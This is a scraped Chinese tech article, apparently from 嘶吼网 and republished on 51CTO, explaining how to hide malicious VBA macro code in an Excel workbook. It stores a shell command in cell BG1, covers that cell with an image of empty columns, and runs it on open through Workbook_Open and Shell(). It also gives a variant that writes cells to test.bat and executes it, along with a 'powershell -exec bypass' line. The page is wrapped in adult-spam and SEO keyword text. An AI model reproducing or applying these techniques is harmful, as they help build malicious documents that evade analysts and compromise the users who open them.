成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

如何在Excel中更好地隱藏惡意宏代碼

安全
你可能會問,為什么不簡單地使用實際上不涉及工作簿的代碼,以及主要原因是避免網絡流量。

 你可能會問,為什么不簡單地使用實際上不涉及工作簿的代碼,以及主要原因是避免網絡流量。當然,你可以簡單地添加宏,這些宏會將每行代碼添加到一個新文件中,以避免網絡流量,但是這樣做會使活動對于任何分析文檔的人來說都是顯而易見的,他們會在查看時立即看到新的代碼行宏。使用這種方法,它使得對惡意文檔的分析稍微困難一些,但是當然不是很多。

[[344792]]

注意:僅對文檔運行oledump或olevba之類的工具將返回宏。

此時你會看到,該宏正在從特定列中提取代碼并使用Shell()執行該代碼,但該代碼顯然非常可疑:

而且,如果我們導航到代碼所在的BG1,我們不會立即看到任何可疑的東西:但是,如果將鼠標懸停在BG1上(或者稍微靠近一下并注意到未對齊的列),那么你會看到在代碼上覆蓋了一個圖像:

顯然,更有耐心的人可以完善空列的屏幕截圖,并將其覆蓋在代碼頂部以使其不那么引人注意。揭示從工作表中提取的代碼的另一種方法是使用MsgBox:

1. 一組要覆蓋在代碼頂部的空列的屏幕截圖,例如:

2. 從工作簿中提取代碼并運行數據的宏:

 

  1. Private Sub Workbook_Open() 
  2. Data = Sheet1.Range("BG1"
  3. Shell(Data) 
  4. End Sub 

 

Data = Sheet1.Range("BG1")僅查看位于BG1的行,提取該行中的所有內容并將其放在變量Data中。

3. 打開文檔并在用戶單擊“啟用內容”后將提取并執行的代碼。

 

  1. powershell.exe -exec bypass -C echo "Hello world" > C:\Users\Desktop\Conduct\Desktop\test.txt 

將代碼插入所需的任何列后,只需將空列的圖像插入代碼上方(插入>插圖>圖片)。

然后將宏插入ThisWorkbook并更改Range()部分以與你的列匹配。因此,如果你將數據插入A列并且位于第一行,它就是Range("A1")。

將多行寫入文件

向文件寫入多行只是小菜一碟,只需要添加幾行代碼即可。

使用的宏代碼如下所示:

 

  1. Private Sub Workbook_Open() 
  2. 1. Dim Path As String 
  3. 2. Dim FileNumber As Integer 
  4. 3. FileNumber = FreeFile 
  5. 4. Data = Sheet1.Range("BG1"
  6. 5. Data2 = Sheet1.Range("BG2"
  7. 6. Path = "test.bat" 
  8. 7. Open Path For Output As FileNumber 
  9. 8.    Print #FileNumber, Data 
  10. 9.    Print #FileNumber, Data2 
  11. 10.    Close FileNumber 
  12. 11. Shell(Path) 
  13. End Sub 

 

第1-3行是靜態的,保持原樣,它們只是定義使用的變量。第4-6行是動態的。你將需要根據excel工作表將4和5中的字符串更改為代碼所在的位置。將第6行更改為所需的文件路徑。

第7-9行也是動態的,它們僅打開文件并將已提取的數據寫入文件。特別是第8和9行是負責將數據寫入文件的行。

只需將要寫入文件的代碼插入到工作簿中,并記下該文件所在的列和行,并更改Data&Data1變量以與你的列和行匹配(如果需要的話,添加更多的變量)。然后,將工作簿中的代碼與空行的屏幕截圖疊加,然后開始就可以了!

責任編輯:華軒 來源: 嘶吼網
相關推薦

2018-10-11 09:40:53

前端JavaScript編程語言

2022-09-12 23:53:53

JavaScript條件判斷開發

2021-05-23 15:46:23

React代碼前端

2019-03-22 14:20:26

管理多云云計算

2023-05-04 07:11:29

2019-01-07 10:24:41

2020-05-15 10:46:11

云成本私有云混合云

2015-11-18 09:56:24

數據中心監控

2023-01-09 08:39:38

因果推斷機器學習

2016-05-16 09:56:01

2017-10-12 15:20:57

數據中心遷移數據云端

2021-02-25 22:17:19

開發技術編程

2020-07-08 08:22:08

FlutterSVGPNG

2009-12-04 10:28:48

VS宏代碼

2023-12-06 13:49:00

低代碼開發

2012-12-20 09:46:42

應用虛擬化

2023-11-09 11:48:41

2022-07-17 15:53:09

云計算多云云管理

2009-11-07 22:03:59

2018-06-26 15:06:37

點贊
收藏

51CTO技術棧公眾號

主站蜘蛛池模板: 国产精品视频免费观看 | 精品国产乱码一区二区三区 | 成人在线视频免费播放 | 国产亚洲精品精品国产亚洲综合 | 91视频在线观看 | 国产线视频精品免费观看视频 | 国产伦精品一区二区三区照片91 | 日日久 | 日本高清中文字幕 | 超碰在线人 | 久久精品超碰 | 日韩在线中文字幕 | 欧美一二区 | 日韩欧美在线观看 | 亚洲a在线视频 | 日韩欧美国产精品一区二区 | 凹凸日日摸日日碰夜夜 | 国产精品观看 | 久久综合久色欧美综合狠狠 | 中文字幕日韩欧美一区二区三区 | 四虎影院久久 | 国产高清在线 | 亚洲一区二区在线电影 | 成人在线电影在线观看 | 伊人中文网 | 亚洲一区播放 | 欧美激情在线一区二区三区 | 三级黄色片在线播放 | 日韩一区二区三区在线观看 | 亚洲国产精品第一区二区 | 视频一区中文字幕 | 久久久久久a | 精品国产鲁一鲁一区二区张丽 | 999精彩视频 | 91精品中文字幕一区二区三区 | 久久综合久色欧美综合狠狠 | 亚洲精品aⅴ | 一级免费看 | 日本在线你懂的 | 日本高清不卡视频 | 精精国产xxxx视频在线 |